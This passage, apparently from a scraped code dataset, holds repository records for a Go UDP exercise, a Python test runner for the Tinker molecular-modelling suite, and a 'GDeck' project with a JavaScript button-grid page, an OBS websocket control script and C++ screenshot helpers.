killChannel:\n\t\t\tif !ok {\n\t\t\t\treturn\n\t\t\t}\n\t\tdefault:\n\t\t\tn,_,err := sock.ReadFromUDP(buf)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err)\n\t\t\t}\n\t\t\tcountstr := string(buf[0:n])\n\t\t\tcount,_ := strconv.Atoi(countstr)\n\t\t\treadChannel<-count\n\t\t}\t\n\t}\t\t\n}" }, { "alpha_fraction": 0.6865671873092651, "alphanum_fraction": 0.8059701323509216, "avg_line_length": 32.5, "blob_id": "3af972c862c11a1aa48dc2227b5e5ce5f9130c02", "content_id": "f6acd1eaaafb5640a961735ee2d7dbd26ea29c7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/README.md", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "# TTK4245\nRepo for the exercises in TTK4145 - Realtime Programming\n" } ]
7
andysim/tinkertests
https://github.com/andysim/tinkertests
09e8e0d222db4e7a37812d8435830b132a3a735a
a3224d71b77a2f70b305794979d26d31718db955
a2400810b59b19be3a76557ea8f7220e949a24d9
refs/heads/master
2021-01-22T21:33:15.686172
2017-03-19T19:23:43
2017-03-19T19:23:43
85,444,062
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7568448781967163, "alphanum_fraction": 0.763363778591156, "avg_line_length": 42.82857131958008, "blob_id": "cb40144f55222d2edd32f16fe3c88627d5cd2e59", "content_id": "cf842de44bdad5442f51362fb0690bca3f4e342d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1534, "license_type": "no_license", "max_line_length": 244, "num_lines": 35, "path": "/README.md", "repo_name": "andysim/tinkertests", "src_encoding": "UTF-8", "text": "# About\n\n\nTinkerTests is currently a standalone test suite for [Tinker](https://dasher.wustl.edu/tinker/), designed with the hope that it will find its way into the [main Tinker code](https://github.com/jayponder/tinker) eventually.\n\n## Usage\n\nThis wrapper is designed to be very lightweight and easy to use, relying primarily on deposited input files and reliable reference outputs. Full usage details, including parallel running and running subsets of tests, can be obtained by running\n\n\truntests.py --help\n\t\nfrom any directory. To run all tests, simply call the `runtests.py` script from any directory, after setting the `TINKERDIR` environment variable to a folder containing the Tinker binaries.\n\n## Input markup\n\nThe script relies on special markers in the input file to determine how the calculation is to be run. See the current tests for examples of how to do this.\n\n#### #Description:\nThis should contain a (80 or fewer character) description of what this test does, for printing purposes.\n\n#### #Labels:\nOne or more labels used to categorize this test case, to allow easy running of a subset of tests using the -l \nflag.\n\n#### #Tolerance:\nSpecifies the precision to which certain quantities are checked. Currently supported values:-\n\n* Energy (default is 1E-6)\n* Gradient (default is 1E-6)\n* Geometry (default is 1E-6)\n\nThese are specified as, *e.g.* `#Tolerance Energy 1E-6` with as many lines as necessary to fully specify all tolerances.\n\n#### #RunCommand:\nThe command to run that will execute the test case.\n" }, { "alpha_fraction": 0.5001141428947449, "alphanum_fraction": 0.5408151745796204, "avg_line_length": 43.23737335205078, "blob_id": "f0463e7388473739578eede2e8235fd1579f51cd", "content_id": "bcb3734b2c1d946708805a759c9e2a84c80e34db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17518, "license_type": "no_license", "max_line_length": 121, "num_lines": 396, "path": "/runtests.py", "repo_name": "andysim/tinkertests", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom glob import glob\nimport os\nimport re\nimport subprocess\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport argparse\nimport sys\n\ndefault_tolerances = {\n 'energy' : 1e-6,\n 'gradient' : 1e-6,\n 'geometry' : 1e-6,\n}\n\ntry:\n TINKERDIR = os.environ['TINKERDIR']\nexcept KeyError:\n TINKERDIR = None\n\n#\n# Parse options\n#\nparser = argparse.ArgumentParser()\nparser.add_argument('-n', '--numprocs',\n type=int,\n help='The number of tests to run simultaneously.',\n default=1)\nparser.add_argument('-l', '--labels',\n nargs='*',\n help='Run only tests containing the label(s) specified')\nparser.add_argument('-m', '--makerefs',\n action='store_true',\n help='Replaces reference files for tests (filtered by labels, if present) instead of testing.')\nparser.add_argument('-f', '--file',\n nargs=1,\n help='Process only the key file specified in this command.')\nparser.add_argument('-t', '--tinkerdir',\n help='The 
location of the tinker binaries (overrides the default found in $TINKERDIR).',\n default=TINKERDIR)\nparser.add_argument('-v', '--verbose',\n action='store_true',\n help='Provide detailed output.')\nargs = parser.parse_args()\n\nif not args.tinkerdir:\n raise Exception("Tinker executable directory not specified. Set the TINKERDIR variable, or use the --tinkerdir flag.")\n\nif not os.path.isdir(args.tinkerdir):\n raise Exception("Tinker executable directory not valid: %s doesn't exist." % args.tinkerdir)\n\n\n\nCSI = "\\x1B["\ndef make_green(s):\n return CSI + "32;1m" + s + CSI + "0m"\n\ndef make_red(s):\n return CSI + "31;1m" + s + CSI + "0m"\n\n\ndef run_tinker(commands, outfile, args):\n """ A helper utility to execute commands (specified as a list), writing the output\n to outfile, and returning the output as a list."""\n\n if not isinstance(commands, list):\n raise ValueError("The commands argument to run_tinker should be a list of strings")\n mycmd = commands[:]\n mycmd[0] = args.tinkerdir + "/" + mycmd[0]\n if args.verbose:\n print("Attempting to run: %s" % " ".join(mycmd))\n with open(outfile, 'w') as fp:\n process = subprocess.Popen(mycmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n stdout,stderr = process.communicate()\n # Python 3 returns a byte stream, so we convert here, just in case\n stdout = stdout.decode(sys.stdout.encoding)\n stderr = stderr.decode(sys.stdout.encoding)\n fp.write(stdout)\n fp.write(stderr + "\\n")\n if process.returncode:\n raise RuntimeError("Command\\n\\n\\t%s\\n\\nFailed. See %s for details." % (" ".join(commands), outfile))\n return stdout.splitlines()\n\n\ndef parse_keywords(keyfile):\n # Copy the defaults, so per-test overrides don't mutate the shared module-level dict\n keywords = { 'tolerance' : dict(default_tolerances),\n 'description' : "",\n 'runcommand' : "",\n 'labels' : []}\n tolerances = default_tolerances.keys()\n for line in keyfile:\n line = line.strip().split()\n if not line: continue\n line[0] = line[0].lower()\n if line[0].startswith('#description'):\n keywords['description'] = " ".join(line[1:])\n elif line[0].startswith('#tolerance'):\n try:\n if len(line) != 3:\n raise Exception()\n key = line[1]\n val = float(line[2])\n if key not in tolerances:\n raise Exception()\n keywords['tolerance'][key] = val\n except:\n raise SyntaxError("Bad tolerance argument! 
Should be\\n\\n#tolerance %s value\\n\\n\" % \"/\".join(tolerances))\n elif line[0].startswith('#labels'):\n keywords['labels'] = line[1:]\n elif line[0].startswith('#runcommand'):\n keywords['runcommand'] = line[1:]\n\n if not keywords['runcommand']:\n raise SyntaxError('#RunCommand not specified.')\n return keywords\n\n\ndef validate(refvals, outvals, keywords, args):\n if refvals.keys() != outvals.keys():\n raise Exception(\"Different keys detected in outputs\")\n failed = False\n for quantity in refvals.keys():\n if args.verbose:\n print(\"\\tChecking %s\" % quantity)\n try:\n tolerance = keywords['tolerance'][quantity]\n except KeyError:\n raise Exception(\"Comparison for %s is not supported.\" % quantity)\n if refvals[quantity].keys() != outvals[quantity].keys():\n raise Exception(\"Different keys detected for %s\" % quantity)\n for component in refvals[quantity].keys():\n out = outvals[quantity][component]\n ref = refvals[quantity][component]\n this_failed = False\n for o,r in zip(out, ref):\n if abs(o-r) > tolerance:\n failed = True\n this_failed = True\n if args.verbose:\n if this_failed:\n print(make_red(\"\\t\\t%s failed\" % component))\n else:\n print(\"\\t\\t%s passed\" % component)\n return failed\n\n\ndef parse_testgrad(out):\n #Total Potential Energy : -0.31418519 Kcal/mole\n totpotre = re.compile(r' Total Potential Energy :\\s*(-?\\d+\\.\\d+) Kcal/mole')\n # Anlyt 1 0.40103733 0.43512325 0.35325000 0.68916525\n agradre = re.compile(r' Anlyt\\s+\\d+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(?:-?\\d+\\.\\d+)')\n # Numer 1 0.40103733 0.43512325 0.35325000 0.68916525\n ngradre = re.compile(r' Numer\\s+\\d+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(?:-?\\d+\\.\\d+)')\n # This is a tough one to compile, but we're going to use it to parse out stuff like\n # Potential Energy Breakdown by Individual Components :\n #\n # Energy EB EA EBA EUB\n # Terms EAA EOPB EOPD EID\n # EIT ET EPT EBT\n # EAT ETT EV EC\n # ECD ED EM EP\n # ER ES ELF EG\n # EX\n #\n # 39.64034584 206.70961139 0.00000000 -4.31167395\n # 0.00000000 0.00000000 0.00000000 0.00000000\n # 0.00000000 0.00000000 0.00000000 0.00000000\n # 0.00000000 0.00000000 -0.16604375 0.00000000\n # 0.00000000 0.00000000 -0.21064571 -0.31418519\n # 0.00000000 0.00000000 0.00000000 0.00000000\n # 0.00000000\n #\n eheaderre = re.compile(r' Potential Energy Breakdown by Individual Components :\\n?')\n elabellinere = re.compile(r' (Energy|Terms)?(\\s+E[A-Z]+)+\\n?')\n evaluelinere = re.compile(r'(\\s+(-?\\d+\\.\\d+))+\\n?')\n elabelre = re.compile(r'E[A-Z]+')\n evaluere = re.compile(r'-?\\d+\\.\\d+')\n def parse_energy_terms(out):\n parsed_some_values = False\n labels = []\n values = []\n for line in out:\n # Look for labels\n match = elabellinere.match(line)\n if match:\n labels.extend(elabelre.findall(line))\n continue\n # Look for numbers\n match = evaluelinere.match(line)\n if match:\n values.extend(map(float, evaluere.findall(line)))\n parsed_some_values = True\n continue\n # The first blank line after the values signals the end for us\n if not line.strip() and parsed_some_values:\n return zip(labels, values)\n\n results = {}\n energy = {}\n gradient = {}\n agrad = []\n ngrad = []\n elabs = []\n evals = []\n for n,line in enumerate(out):\n # Total potential energy\n matches = totpotre.match(line)\n if matches: energy['Total Potential'] = [float(matches.group(1))]\n # Energy components\n matches = eheaderre.match(line)\n if matches:\n for l,v in parse_energy_terms(out[n:]):\n energy[l] = [v]\n # 
Numerical gradient\n matches = ngradre.match(line)\n if matches: ngrad.extend(map(float, matches.groups(1)))\n # Analytic gradient\n matches = agradre.match(line)\n if matches: agrad.extend(map(float, matches.groups(1)))\n\n if agrad: gradient['Analytic'] = agrad\n if ngrad: gradient['Numerical'] = ngrad\n results['energy'] = energy\n results['gradient'] = gradient\n return results\n\n\ndef parse_analyze(out):\n floatre = re.compile(r'-?\\d+\\.\\d+')\n results = {}\n energy = {}\n gradient = {}\n geometry = {}\n for n,line in enumerate(out):\n sl = line.split()\n # dE/dV (Virial-based) : 0.068212 Kcal/mole/A**3\n if line.startswith(\" dE/dV (Virial-based) :\"): gradient['Analytic Virial'] = [ float(sl[3]) ]\n # dE/dV (Finite Diff) : 0.068208 Kcal/mole/A**3\n if line.startswith(\" dE/dV (Finite Diff) :\"): gradient['Numerical Virial'] = [ float(sl[4]) ]\n # Pressure (Analytical, 0 K) : -4677.200 Atmospheres\n if line.startswith(\" Pressure (Analytical, 0 K) :\"): gradient['Analytical Pressure'] = [ float(sl[5]) ]\n # Pressure (Numerical, 0 K) : -4676.892 Atmospheres\n if line.startswith(\" Pressure (Numerical, 0 K) :\"): gradient['Numerical Pressure'] = [ float(sl[5]) ]\n # Bond Stretching 6349.1257 16569\n if line.startswith(\" Bond Stretching \"): energy['Bond Stretching'] = [ float(sl[2]) ]\n # Angle Bending 3749.0542 11584\n if line.startswith(\" Angle Bending \"): energy['Angle Bending'] = [ float(sl[2]) ]\n # Stretch-Bend -19.7897 4031\n if line.startswith(\" Stretch-Bend \"): energy['Stretch-Bend'] = [ float(sl[1]) ]\n # Urey-Bradley 668.1058 7023\n if line.startswith(\" Urey-Bradley \"): energy['Urey-Bradley'] = [ float(sl[1]) ]\n # Out-of-Plane Bend 110.8436 1566\n if line.startswith(\" Out-of-Plane Bend \"): energy['Out-of-Plane Bend'] = [ float(sl[2]) ]\n # Torsional Angle 433.6959 6701\n if line.startswith(\" Torsional Angle \"): energy['Torsional Angle'] = [ float(sl[2]) ]\n # Pi-Orbital Torsion 58.7507 292\n if line.startswith(\" Pi-Orbital Torsion \"): energy['Pi-Orbital Torsion'] = [ float(sl[2]) ]\n # Torsion-Torsion -41.9998 147\n if line.startswith(\" Torsion-Torsion \"): energy['Torsion-Torsion'] = [ float(sl[1]) ]\n # Van der Waals 31548.0594 8304545\n if line.startswith(\" Van der Waals \"): energy['Van der Waals'] = [ float(sl[3]) ]\n # Atomic Multipoles -78760.2884 1667721\n if line.startswith(\" Atomic Multipoles \"): energy['Atomic Multipoles'] = [ float(sl[2]) ]\n # Polarization -31796.4657 1667721\n if line.startswith(\" Polarization \"): energy['Polarization'] = [ float(sl[1]) ]\n # Internal Virial Tensor : 17258.896 115.886 -307.770\n # 115.886 16300.180 778.428\n # -307.770 778.428 15756.319\n if line.startswith(\" Internal Virial Tensor :\"):\n gradient['Virial Tensor'] = map(float, floatre.findall(\"\".join(out[n:n+3])))\n # Dipole Moment Magnitude : 1244.807 Debyes\n if line.startswith(\" Dipole Moment Magnitude :\"): energy['Dipole Norm'] = [ float(sl[4]) ]\n # Dipole X,Y,Z-Components : 1123.325 247.506 475.843\n if line.startswith(\" Dipole X,Y,Z-Components :\"): energy['Dipole Components'] = map(float, sl[3:6])\n # Quadrupole Moment Tensor : -1402.777 3261.667 3912.700\n # (Buckinghams) 3261.667 900.860 12633.678\n # 3912.700 12633.678 501.917\n if line.startswith(\" Quadrupole Moment Tensor :\"):\n energy['Quadrupole Components'] = map(float, floatre.findall(\"\".join(out[n:n+3])))\n # Radius of Gyration : 30.915 Angstroms\n if line.startswith(\" Radius of Gyration :\"): geometry['Radius of Gyration'] = [ float(sl[4]) ]\n # Total Potential Energy : 
-67700.9082 Kcal/mole\n if line.startswith(\" Total Potential Energy :\"): energy['Total Potential'] = [ float(sl[4]) ]\n results['energy'] = energy\n results['gradient'] = gradient\n results['geometry'] = geometry\n return results\n\n\ndef check_results(command, out, ref, keywords, args):\n \"\"\" The general strategy here is to parse out results into a common data structure, a dict of dict of lists:\n results[type][name] = [ val(s) ]\n where type is energy, gradient, coords, etc. (see keys of default_tolerances above); name is\n the specific quantity being tested, e.g. polarization energy, bonded energy. This way we can\n write a very generic validation routine (energies, forces and gradients can be tested the same way)\n that can obey tolerances provided by the user. Note that this means energies are provided as a list.\n By storing the names in the second index, we can print out meaningful messages with verbose on. \"\"\"\n\n if command[0] == 'testgrad':\n if args.verbose: print(\"Checking testgrad outputs\")\n refvals = parse_testgrad(ref)\n outvals = parse_testgrad(out)\n elif command[0] == 'analyze':\n if args.verbose: print(\"Checking analyze outputs\")\n refvals = parse_analyze(ref)\n outvals = parse_analyze(out)\n else:\n raise Exception(\"No handler defined to check %s yet!\" % command[0])\n return validate(refvals, outvals, keywords, args)\n\n\ndef run_testcase(testcase):\n \"\"\" Runs all steps needed for a single test case \"\"\"\n reffile = testcase + '.ref'\n outfile = testcase + '.out'\n\n with open('%s.key'%testcase, 'r') as fp:\n keywords = parse_keywords(fp)\n\n if args.labels:\n # The user asked to only run a subset; check to see if this test is included\n skip_this = True\n for argslabel in args.labels:\n argslabel = argslabel.lower()\n if argslabel in keywords['labels']:\n skip_this = False\n break\n if skip_this:\n if args.verbose:\n print(\"Specified label not found, skipping %s\" % testcase)\n return\n\n if args.makerefs:\n # Just make the reference outputs; no comparison\n print(\"\\tUpdating reference output for %s\" % testcase)\n run_tinker(keywords['runcommand'], reffile, args)\n else:\n # Run tests and compare to reference outputs\n if args.verbose:\n print(\"Working on %s...\\n\" % testcase)\n\n output = run_tinker(keywords['runcommand'], outfile, args)\n if check_results(keywords['runcommand'], output, open(reffile).readlines(), keywords, args):\n line = ' {0:.<86}FAILED'.format(keywords['description'])\n print(make_red(line))\n failures.append(testcase)\n else:\n line = ' {0:.<86}PASSED'.format(keywords['description'])\n print(line)\n\n\n#\n# Run the tests\n#\ntry:\n # Change directory to the tests\n scriptpath = os.path.dirname(os.path.realpath(__file__))\n testspath = scriptpath + '/tests'\n os.chdir(testspath)\n\n # Figure out the list of work\n if args.file:\n testcases = [ os.path.splitext(args.file[0])[0] ]\n else:\n testcases = [ os.path.splitext(testname)[0] for testname in glob('*.key') ]\n\n print(\"\\n\\tTesting binaries located in %s\" % args.tinkerdir)\n print(\"\\tRunning from %s, using %d cores\\n\" % (testspath, args.numprocs))\n\n failures = []\n if args.makerefs:\n print(\"\\t###########################################################\")\n print(\"\\t# WARNING! Reference files will be updated. You should #\")\n print(\"\\t# only be doing this with a reliable version of Tinker. 
#\")\n print(\"\\t###########################################################\")\n\n\n # Set up a pool of workers to crank out the work in parallel\n pool=ThreadPool(args.numprocs)\n pool.map(run_testcase, sorted(testcases))\n pool.close()\n pool.join()\nexcept KeyboardInterrupt:\n print(\"\\nTesting interrupted...\\n\")\n if len(failures):\n print(\"\\n The following tests failed:\\n\")\n print(\"\\n\".join(failures))\n sys.exit(1)\n\nif len(failures):\n print(\"\\nThe following %d of %d tests failed:\\n\" % (len(failures), len(testcases)))\n print(\"\\n\".join(failures))\nelse:\n if not args.makerefs:\n print(\"\\n All %d tests succeeded!\\n\" % len(testcases))\n" } ]
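For reference, the nested layout built by parse_testgrad and parse_analyze above, and walked by validate(), looks like the following. This is a minimal illustrative sketch: the numeric values are copied from the sample Tinker output lines quoted in the script's own comments, and the tolerance keys are assumed to match whatever default_tolerances defines earlier in the script.

```python
# Shape of the parsed results consumed by validate(): results[type][name] = [values].
# Values below are taken from the example output lines in the comments above.
refvals = {
    'energy': {
        'Total Potential': [-0.31418519],   # from "Total Potential Energy :"
        'Bond Stretching': [39.64034584],   # from the component breakdown table
    },
    'gradient': {
        'Analytic':  [0.40103733, 0.43512325, 0.35325000],
        'Numerical': [0.40103733, 0.43512325, 0.35325000],
    },
}

# validate() compares refvals[quantity][component] element-wise against the
# matching outvals entry, using keywords['tolerance'][quantity] as the cutoff,
# so one tolerance per quantity (energy, gradient, ...) covers every component.
```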
2
Logi-Meichu/GDeck
https://github.com/Logi-Meichu/GDeck
298e431c281c7aa8514ea0883734519f52bdffde
3362e9e87b43317383b03ea6f4f16d729390accf
7fc82d1388dd920a16b51918aef257b8387bff6d
refs/heads/master
2020-04-03T05:09:31.857415
2018-10-28T05:23:07
2018-10-28T05:23:07
155,036,551
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5812652111053467, "alphanum_fraction": 0.5895377397537231, "avg_line_length": 32.15322494506836, "blob_id": "d28dc4d1e8e614f28ca17869a23c6f0e4563d132", "content_id": "2b5af7f8c5011bc5fbe1a5f90c6b3a079f1ca397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4110, "license_type": "no_license", "max_line_length": 117, "num_lines": 124, "path": "/frontend/index.js", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "const $body = document.getElementsByTagName(\"body\")[0];\nlet curPage = 0;\n\nconst createPages = () => {\n return [...Array(4).keys()].map((i) => {\n const $div = document.createElement('div');\n $div.className = `page page-${i} ${i === 0 ? 'active' : 'page-next'}`;\n $div.pageid = i;\n $body.appendChild($div);\n \n const $container = document.createElement('div');\n $container.className = 'page-container';\n $div.appendChild($container);\n \n\n return [$div, $container];\n });\n}\n\nconst createGrids = ($page) => {\n [...Array(6).keys()].forEach((i) => {\n const $grid = document.createElement('div');\n $grid.className = `grid grid-${i}`;\n \n const $imgWrapper = document.createElement('div');\n $imgWrapper.id = `page-${$page[0].pageid}-grid-${i}`;\n $imgWrapper.className = 'img-wrapper';\n $grid.appendChild($imgWrapper);\n\n const $clickRing = document.createElement('div');\n $clickRing.className = 'click-ring';\n $imgWrapper.appendChild($clickRing);\n \n const $icon = document.createElement('img');\n $icon.src = `https://people.cs.nctu.edu.tw/~wctsai1130/gdeck/${$page[0].pageid}-${i}.png?v=${Math.random()}`;\n $icon.className = 'ico'\n $imgWrapper.appendChild($icon);\n \n $page[1].appendChild($grid);\n\n $imgWrapper.style = `height: ${$imgWrapper.clientWidth}px`;\n\n $icon.addEventListener('click', function() {\n $clickRing.className = `${$clickRing.className} active`;\n setTimeout(() => {\n $clickRing.className = $clickRing.className.replace('active', '');\n }, 400);\n });\n });\n}\n\nconst active = (i, $pages) => {\n $pages.forEach(($p) => {\n $p = $p[0];\n if ($p.pageid === i) {\n $p.className = $p.className.replace(/page-next|page-pre/, 'active');\n } else if ($p.pageid < i) {\n $p.className = $p.className.replace(/page-next|active/, 'page-pre');\n } else {\n $p.className = $p.className.replace(/page-pre|active/, 'page-next');\n }\n });\n};\n\nconst $pages = createPages();\n$pages.forEach($p => createGrids($p));\n\nconst $scrollup = document.getElementById('scroll-up');\nconst $scrolldown = document.getElementById('scroll-down');\n\n$scrollup.addEventListener('click', function() {\n if (curPage === 0) {\n return;\n }\n if (curPage-1 === 0) {\n this.className = `${this.className} disabled`;\n } else {\n this.className = this.className.replace('disabled', '');\n }\n active(curPage - 1, $pages);\n $scrolldown.className = $scrolldown.className.replace('disabled', '');\n curPage -= 1;\n});\n\n$scrolldown.addEventListener('click', function() {\n if (curPage === 3) {\n return;\n }\n if (curPage+1 === 3) {\n this.className = `${this.className} disabled`;\n } else {\n this.className = this.className.replace('disabled', '');\n }\n active(curPage + 1, $pages);\n $scrollup.className = $scrollup.className.replace('disabled', '');\n curPage += 1;\n});\n\nconst $screenshotWrapper = document.getElementById('screenshot-wrapper');\nconst $screenshot = document.getElementById('screenshot');\n$screenshot.src = `screenshot.jpg?v=${Math.random()}`;\nconst $drop = 
document.getElementsByClassName('sc-drop')[0];\nconst $sharedrop = document.getElementsByClassName('sc-share-drop')[0];\n\n$screenshot.addEventListener('error', function() {\n console.log('error');\n $screenshotWrapper.style = 'display: none';\n $drop.style = 'display: none';\n $sharedrop.style = 'display: none';\n});\n\n$screenshotWrapper.addEventListener('click', function() {\n $drop.className = `${$drop.className} active`;\n});\n\ndocument.getElementById('sc-share').addEventListener('click', function() {\n $sharedrop.className = `${$sharedrop.className} active`;\n});\n\ndocument.getElementById('sc-close').addEventListener('click', function() {\n $screenshotWrapper.style = 'left: -70vw';\n $drop.style = 'left: -20vw';\n $sharedrop.style = 'left: -20vw';\n});" }, { "alpha_fraction": 0.5369161367416382, "alphanum_fraction": 0.5580110549926758, "avg_line_length": 23.887500762939453, "blob_id": "accc791e5332cc27a33196ee2e8a52def3b71652", "content_id": "f5ba780fa2c745ab25efb12891c7bf003cadc17b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1991, "license_type": "no_license", "max_line_length": 66, "num_lines": 80, "path": "/MFC_SAMPLE/MFCSample/obs.py", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport time\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nsys.path.append('../')\nfrom obswebsocket import obsws, requests\n\n\nhost = \"172.16.0.50\"\nport = 4444\npasswd = \"gdeck\"\n\nclass OBS(object):\n    def __init__(self, host, port, passwd):\n        try:\n            self.ws = obsws(host, port, passwd)\n            self.ws.connect()\n            print('Connected!')\n        except Exception as e:\n            print(e, file=sys.stderr)\n\n    def ToggleMute(self, *args):\n        return self.ws.call(requests.ToggleMute(args[0]))\n\n    def StartRecording(self, *args):\n        return self.ws.call(requests.StartRecording())\n\n    def StopRecording(self, *args):\n        return self.ws.call(requests.StopRecording())\n\n    def SetMute(self, *args):\n        arg = []\n        arg.append(args[0])\n        arg.append(int(args[1]) > 0)\n        return self.ws.call(requests.SetMute(*arg))\n\n    def IncVolume(self, *args):\n        v = float(self.GetVolume(args[0]))\n        if v <= 0.9:\n            v += 0.1\n        elif v < 1.0:\n            v = 1.0\n        return self.ws.call(requests.SetVolume(args[0], v))\n\n    def DecVolume(self, *args):\n        v = float(self.GetVolume(args[0]))\n        if v >= 0.1:\n            v -= 0.1\n        elif v > 0:\n            v = 0\n        return self.ws.call(requests.SetVolume(args[0], v))\n\n    def SetSceneItemPosition(self, *args):\n        arg = []\n        arg.append(args[1])\n        arg.append(float(args[2]))\n        arg.append(float(args[3]))\n        arg.append(args[0])\n        return self.ws.call(requests.SetSceneItemPosition(*arg))\n\n    def GetVolume(self, *args):\n        return self.ws.call(requests.GetVolume(*args)).getVolume()\n\n    def exit(self):\n        self.ws.disconnect()\n\n\nif __name__ == '__main__':\n    obs = OBS(host, port, passwd)\n    if len(sys.argv) > 1:\n        func = getattr(obs, sys.argv[1])\n        r = func(*sys.argv[2:])\n        print(r)\n    print('exited')\n    obs.exit()\n" }, { "alpha_fraction": 0.7448275685310364, "alphanum_fraction": 0.7448275685310364, "avg_line_length": 20.714284896850586, "blob_id": "dd2882140e746c6ae2d9684688bcc49efe353d6b", "content_id": "af5fec9046b66238195948c124557954d1bc2dc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 145, "license_type": "no_license", "max_line_length": 59, "num_lines": 7, "path": "/README.md", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "# 
GDeck\n\n# Run\n+ open `MFCSample.vcxproj` in MFCSample using Visual Studio\n+ Compile the code\n+ Install ARX on your device\n+ Connect to the host\n" }, { "alpha_fraction": 0.7244898080825806, "alphanum_fraction": 0.7244898080825806, "avg_line_length": 18.600000381469727, "blob_id": "0bddb36df84b76201181d5c0977706f0de9b5158", "content_id": "4c65aca1acfefdef8d245752b6129ab098a2a2c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 98, "license_type": "no_license", "max_line_length": 28, "num_lines": 5, "path": "/MFC_SAMPLE/MFCSample/WindowsControl.h", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "#include <wingdi.h>\n#include <shlobj.h>\n\nHBITMAP get_screen_bitmap();\nvoid save_to_disk(HBITMAP);\n" }, { "alpha_fraction": 0.7276560068130493, "alphanum_fraction": 0.733558177947998, "avg_line_length": 24.7608699798584, "blob_id": "12712371534ea94e9af783f01f7a63c6ba290e13", "content_id": "0f965774b7635d4ae3110224ebcb13c6a1d7bed5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 100, "num_lines": 46, "path": "/MFC_SAMPLE/MFCSample/WindowsControl.cpp", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "#include \"stdafx.h\"\n#include \"WindowsControl.h\"\n#include <string>\n\nusing namespace std;\n\nHBITMAP get_screen_bitmap()\n{\n\t// get the device context of the screen\n\tHDC hScreenDC = CreateDC(L\"DISPLAY\", NULL, NULL, NULL);\n\t// and a device context to put it in\n\tHDC hMemoryDC = CreateCompatibleDC(hScreenDC);\n\n\tint width = GetDeviceCaps(hScreenDC, HORZRES);\n\tint height = GetDeviceCaps(hScreenDC, VERTRES);\n\n\t// maybe worth checking these are positive values\n\tHBITMAP hBitmap = CreateCompatibleBitmap(hScreenDC, width, height);\n\n\t// get a new bitmap\n\tHBITMAP hOldBitmap = (HBITMAP) SelectObject(hMemoryDC, hBitmap);\n\n\tBitBlt(hMemoryDC, 0, 0, width, height, hScreenDC, 0, 0, SRCCOPY);\n\thBitmap = (HBITMAP) SelectObject(hMemoryDC, hOldBitmap);\n\n\t// clean up\n\tDeleteDC(hMemoryDC);\n\tDeleteDC(hScreenDC);\n\n\treturn hBitmap;\n\t// now your image is held in hBitmap. You can save it or do whatever with it\n\n}\n\nvoid save_to_disk(HBITMAP bmp)\n{\n\n\twchar_t mypicturespath[256];\n\tHRESULT result = SHGetFolderPath(NULL, CSIDL_MYPICTURES, NULL, SHGFP_TYPE_CURRENT, mypicturespath);\n\n\t//string path({mypicturespath, \"\\\\\", \"filename.jpg\" });\n\n\tCImage image;\n\timage.Attach(bmp);\n\timage.Save(L\"filename.jpg\");\n}\n\n" } ]
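Besides the command-line dispatch at the bottom of obs.py (`getattr(obs, sys.argv[1])`), the OBS wrapper can also be driven programmatically. A small sketch, assuming obs.py is importable from the current directory, that obs-websocket is reachable with the host/port/password constants defined in that file, and that a source named 'Mic/Aux' exists in the current scene (the source name is purely illustrative):

```python
# Programmatic use of the OBS wrapper defined in obs.py. 'Mic/Aux' is a
# hypothetical source name; substitute a source from your own OBS scene.
from obs import OBS, host, port, passwd

obs = OBS(host, port, passwd)
obs.StartRecording()
obs.SetMute('Mic/Aux', 1)   # second argument > 0 mutes the source
obs.IncVolume('Mic/Aux')    # steps the volume up by 0.1, capped at 1.0
obs.StopRecording()
obs.exit()
```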
5
Mot0511/Standoff2Bot
https://github.com/Mot0511/Standoff2Bot
5d86e7f1b096d9734248692c4e7123d9f18a0532
17c2862cf4a4759ff1773dd05a7bb159e9073b63
d8d0337f5a181d81f17e0c4fb5c1ccc8ee9f31ec
refs/heads/master
2023-03-30T17:35:41.689448
2021-04-06T17:01:51
2021-04-06T17:01:51
355,266,956
1
0
null
null
null
null
null
